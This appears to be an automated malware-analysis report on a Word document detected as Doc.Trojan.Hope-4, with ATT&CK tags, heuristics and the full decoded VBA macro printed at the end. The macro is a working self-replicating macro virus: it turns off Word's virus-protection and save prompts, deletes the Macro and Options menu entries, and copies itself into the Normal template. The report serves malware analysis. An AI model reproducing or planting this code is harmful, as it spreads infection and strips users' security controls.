MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The heuristic firings and ClamAV detection strongly indicate malicious intent. The macro attempts to modify the Word application's command bars to remove access to macro security settings, likely to prevent user intervention.
Heuristics 3
-
ClamAV: Doc.Trojan.Hope-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hope-4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2242 bytes |
SHA-256: 3496dcbce8f5b00d2bc3ac88897999f00ca60baf46755f36e94681dd2e282514 |
|||
|
Detection
ClamAV:
Doc.Trojan.Hope-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'29/12/99 09:49:11Kyocera FS-600 on LPT1:Wycombe Reference Librarysdjw3456ot76 weor9w5834958329/12/99 09:49:11
Sub ViewVBCode()
'29/12/99 09:49:11Kyocera FS-600 on LPT1:Wycombe Reference Librarysdjw3456ot76 weor9w5834958329/12/99 09:49:11
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
'29/12/99 09:49:11Kyocera FS-600 on LPT1:Wycombe Reference Librarysdjw3456ot76 weor9w5834958329/12/99 09:49:11
End Sub
'MV Version 1e
Private Sub Document_Open(): Document_Close: End Sub
'withered rope you hang what's empty can't remain to put it simply
Private Sub Document_Close(): On Error Resume Next
'in time cry the hollow words to sing with false disguise smothered
Options.ConfirmConversions = (0 - 0): Options.SaveNormalPrompt = (1 - 1): Options.VirusProtection = (2 - 2)
'hope fly from sorrow for a new divine tomorrow i just don't want
CommandBars("Tools").Controls("Macro").Delete: CommandBars("Tools").Controls("Options...").Delete
'to know anymore life shifts up and down everybody knows it's wrong
Set CM = MacroContainer.VBProject.VBComponents.Item(1).CodeModule
'why don't you care? now do it seem fair? it's not in the rhyme or
Set ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
'reason so it goes with every season crawl to top fall through
Set nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
'bottom first hand love is really rotten slice of life find what's
MC = CM.Lines(1, CM.CountOfLines)
'plenty inch towards a sanctuary light with me inside the womb i
ad.deletelines 1, ad.CountOfLines: ad.AddFromString MC
'know everyone everybody knows it's me it's my voice, my voice
nt.deletelines 1, nt.CountOfLines: nt.AddFromString MC
'cries out obscenity sightless eye regard my past sometimes it
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'should i just don't want to know anymore.
End Sub
'NoHope~By~Lys~KovicK Lyrics From Smothered Hope(Skinny Puppy)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.